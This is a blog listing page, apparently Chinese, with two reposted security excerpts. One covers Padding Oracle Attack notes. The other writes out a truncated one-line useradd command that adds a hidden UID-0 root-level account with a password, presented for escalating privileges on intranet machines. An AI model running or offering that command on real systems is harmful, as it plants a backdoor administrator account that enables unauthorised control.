- 博客(2)
- 收藏
- 关注
RSS订阅转载 Padding Oracle Attack 笔记
转自:http://www.secpulse.com/archives/3537.html 0x01 Padding Oracle Attack 经常在 WVS 扫描的时候出现,但是作为渣渣的 rr 不会去利用这个漏洞。然而实际上,这个漏洞非常普遍,按照分类来说任意文件读取,但是利用成本略高,导致并不像网上常见的任意文件下载、本地文件包含或者是本地文件读取之类的漏洞一样流行。
2016-12-23 17:12:38
433
转载 linux一条命令添加一个root级别账户并设置密码
原文件链接 :http://www.2cto.com/Article/201307/230717.html 内网机器提权添加账户,无回显,设置密码就不好弄,下面就是添加一个root级别的账户并设置密码的命令 useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/
2016-12-23 17:10:21
4153
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人